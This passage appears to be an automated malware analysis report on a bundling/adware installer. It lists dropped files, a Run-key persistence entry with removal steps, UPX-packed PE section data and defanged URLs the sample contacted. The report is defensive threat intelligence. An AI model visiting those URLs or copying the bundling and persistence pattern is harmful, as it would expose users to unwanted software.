%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网å€导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å¿«æÂ·å¯¼èˆª\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-æ·˜å®Â网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网å€导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-æ·˜å®Â网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å¿«æÂ·å¯¼èˆª\网å€导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
%Program Files%\xfplay\tools.exe (1530 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 1183744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 1187840 | 20480 | 19968 | 5.41054 | 0437776d67d96306722fa79af85af88b |
.rsrc | 1208320 | 28672 | 25600 | 4.38322 | f5640d017a00b32df01ad9febdbde008 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ww.qianniannuan.com/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 | |
hxxp://cdn.dh3.daicuo.com/u.php?id=89 | |
hxxp://aq8.cc/?89-sd--ant- | |
hxxp://aq8.cc/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 | |
hxxp://aq8.cc/View/Home/Task/css.base.css?1.0.247 | |
hxxp://aq8.cc/View/Home/Task/css.task.css?1.0.247 | |
hxxp://aq8.cc/Public/html5shiv/3.7.2/html5shiv.min.js | |
hxxp://dc.cdn.daicuo.com/dc.base/1.0.3/css/base.min.css?1.0.247 | |
hxxp://at.alicdn.com.danuoyi.alicdn.com/t/font_1415073294_4967172.eot? | 188.254.86.250 |
hxxp://aq8.cc/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? | |
hxxp://aq8.cc/Public/respond/1.4.2/respond.min.js | |
hxxp://aq8.cc/Public/images/sns_qq.png | |
hxxp://aq8.cc/Public/jquery/1.11.3/jquery.min.js?1.0.247 | |
hxxp://cdn.dh3.daicuo.com/tool/install.txt | |
